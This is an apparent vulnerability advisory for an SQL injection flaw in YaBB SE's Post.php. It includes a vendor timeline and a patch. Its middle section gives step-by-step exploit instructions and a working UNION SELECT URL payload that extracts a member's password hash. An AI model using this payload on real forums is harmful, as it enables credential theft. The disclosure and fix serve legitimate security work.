|
Summary YaBB SE is a PHP/MySQL port of the popular forum software YaBB (yet another bulletin board). An SQL injection vulnerability allows a remote attacker to execute malicious SQL statements on the database remotely Details Vulnerable Systems: * YaBB SE versions 1.5.4, 1.5.5, possibly others The file Post.php is vulnerable to SQL injection because the quote parameter isn't checked against malicious input, so is possible to inject SQL. How To Exploit the vulnerability: 1- you need to be a registered user to exploit this hole. 2- Click any board you see. ex. General Discussion. 3- Click any message. ex Welcome to YaBB SE! 4- Now view the source code of this page and search this string "sesc" withou the quotes this is the session id , is an hex number of 32 characters ex.(13a478d8aa161c2231e6d3b36b6d19f2), you'll need this later 5- now your url is something like this http://vulnhost/yabbse/index.php?board=1;action=display;threadid=1 6- change your url to look like this. http://localhost:8080/yabbse//index.php?board=1;sesc=13a478d8aa16 1c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/* the value of sesc is the value you get before from the source code and voilá you get the hashed password from the user with the id = 1 in the Subject textBox something like this Re:e320774659b1b23333bd033754d21bc4 Vendor Status: january 23, 2004: I contacted the vendor january 23, 2004: Vendor says they are working on it. january 29, 2004: I send another email to know how the work was progressing. No Response. february 3, 2004 I send another email to know the status of the work. february 4, 2004 Vendor says the'll figure how to do. february 16, 2004 I doesn't want to keep waiting, so i publish the vulnerability. Temporal Solution: Open Post.php and go around line 49 you'll see something like this. $quotemsg = $quote; change to this. if ( !is_numeric($quote) ) { die('Go out C==|=======>'); } $quotemsg = $quote; that's it. Credits go to: BackSpace